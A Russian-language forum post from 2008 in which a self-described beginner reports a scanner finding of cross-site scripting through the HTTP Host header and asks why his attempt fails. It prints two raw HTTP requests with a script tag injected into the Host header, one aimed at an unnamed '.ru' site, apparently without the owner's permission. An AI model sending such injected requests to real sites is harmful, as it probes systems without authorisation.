Показать сообщение отдельно

  #660  
Старый 10.01.2008, 01:23
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329

Репутация: -2
По умолчанию

Всем превед,нашёл тот сайтег прикольный гг))

При скане нашёл такую бадягу- XSS через HTTP:P.

По дефолтовскому коду дали пример:

GET /SITE HTTP/1.1
Host: ivbgj<xscript>XSS</xscript>.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

P.S.:

SITE- хост разумееца : )

Переделал и отправил:

GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

Серв либо отвечает,либо,если чё переделать слегка, выходит,что вообще молчание:Р

Расскажите, что я сделал(или нахимичил хз),а всё никаг.В подробности уязвимости был дан дефолтовский код.

P.S. Юзил перехватичик+отправщег пакетофф с сайта)(( (Хотя... в HTTP йа нупище,стараюсь=___=).
 
Ответить с цитированием